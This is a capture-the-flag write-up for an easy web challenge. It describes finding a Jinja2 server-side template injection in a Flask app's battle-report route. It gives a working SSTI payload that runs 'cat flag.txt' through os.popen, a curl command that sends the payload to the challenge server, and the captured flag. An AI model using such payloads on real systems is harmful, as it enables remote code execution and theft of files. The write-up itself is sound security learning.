📊 Challenge Overview

Category	Details	Additional Info
🏆 Event	Cyber Apocalypse CTF - 2025	Event Link
🔰 Category	Web	🌐
💎 Points	1000	Out of 1000 total
⭐ Difficulty	🟢 Easy	Personal Rating: 2/10
👤 Author	Unknown	Profile
🎮 Solves (At the time of flag submission)	24	solve rate
📅 Date	21-03-2025	Cyber Apocalypse CTF - 2025
🦾 Solved By	mH4ck3r0n3	Team: QnQSec

📝 Challenge Information

As you ascend the treacherous slopes of the Flame Peaks, the scorching heat and shifting volcanic terrain test your endurance with every step. Rivers of molten lava carve fiery paths through the mountains, illuminating the night with an eerie crimson glow. The air is thick with ash, and the distant rumble of the earth warns of the danger that lies ahead. At the heart of this infernal landscape, a colossal Fire Drake awaits—a guardian of flame and fury, determined to judge those who dare trespass. With eyes like embers and scales hardened by centuries of heat, the Fire Drake does not attack blindly. Instead, it weaves illusions of fear, manifesting your deepest doubts and past failures. To reach the Emberstone, the legendary artifact hidden beyond its lair, you must prove your resilience, defying both the drake’s scorching onslaught and the mental trials it conjures. Stand firm, outwit its trickery, and strike with precision—only those with unyielding courage and strategic mastery will endure the Trial by Fire and claim their place among the legends of Eldoria.

🎯 Challenge Files & Infrastructure

Provided Files

Files:

•  Attached Files

🔍 Initial Analysis

First Steps

Initially, the website appears as follows:

Upon entering the name, I was redirected to the following page:

It’s a web application simulating a battle against a dragon. Once the battle was over, I was redirected to /battle-report:

where all the battle statistics were displayed. I then decided to analyze the attached files. Inside the challenge/application/blueprints folder, I found the routes.py file (it’s a Flask application), where all the routes for the web application were defined. I noticed that the /battle-report route built a template by inserting parameters directly from the request:

1 2 3 4 5 6 7 8 9 10 11 12

@web.route('/battle-report', methods=['POST']) def battle_report(): warrior_name = session.get("warrior_name", "Unknown Warrior") battle_duration = request.form.get('battle_duration', "0") stats = { 'damage_dealt': request.form.get('damage_dealt', "0"), 'damage_taken': request.form.get('damage_taken', "0"), 'spells_cast': request.form.get('spells_cast', "0"), 'turns_survived': request.form.get('turns_survived', "0"), 'outcome': request.form.get('outcome', 'defeat') }

As we can see, these are the same parameters displayed in the previous screenshot. From this, we can already suspect that this is a SSTI (Server-Side Template Injection) vulnerability in Jinja. Let’s proceed to the next phase.

🔬 Vulnerability Analysis

Potential Vulnerabilities

• SSTI (Server Side Template Injection)

🎯 Solution Path

Exploitation Steps

Initial setup

Since the name was one of the parameters and it was the only one I could pass without making a POST request directly to /battle-report, I decided to check if there was a template injection vulnerability by registering with the name {{ 7*7 }}. If there was indeed a template injection, after completing the battle, I would be redirected to /battle-report, and 7*7 would be evaluated, resulting in 49. So, I entered {{ 7*7 }}:

After doing this, I completed the battle against the dragon and got:

As we can see, my name is no longer {{ 7*7 }}, but 49, which confirms that the parameters are indeed vulnerable to SSTI. Let’s move on to the exploitation phase.

Exploitation

Now, I need to read the flag.txt file. To do this, I searched for a payload on HackTricks, and modified it to execute cat flag.txt:

1	{{ config.__class__.from_envvar.__globals__.import_string("os").popen("cat flag.txt").read() }}

After that, I used curl to make a POST request directly to /battle-report, as the name parameter is vulnerable, but there’s a character limit, so I couldn’t insert the entire payload there:

1	curl -X POST -d "battle_duration=1&damage_dealt={{ config.__class__.from_envvar.__globals__.import_string('os').popen('cat flag.txt').read() }}&damage_taken=0&spells_cast=0&turns_survived=0&outcome=defeat" http://83.136.253.44:40436/battle-report

Once I got the response, I searched for HTB in tmux and found the flag.

Flag capture

🛠️ Exploitation Process

Approach

The automated exploit sends a POST request with the SSTI and extracts the flag from the response using a regex.

•  Exploit

🚩 Flag Capture

Flag

HTB{Fl4m3_P34ks_Tr14l_Burn5_Br1ght_0d0e0caef6ee5a6f91194c9428941362}

Proof of Execution

Screenshot of successful exploitation

🔧 Tools Used

Tool	Purpose
Python	Exploit
Curl	Web Testing

💡 Key Learnings

Skills Improved

• Binary Exploitation
• Reverse Engineering
• Web Exploitation
• Cryptography
• Forensics
• OSINT
• Miscellaneous

📚 References & Resources

Learning Resources

• https://book.hacktricks.wiki/en/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.html

📊 Final Statistics

Created: 21-03-2025 • Last Modified: 21-03-2025 Author: mH4ck3r0n3 • Team: QnQSec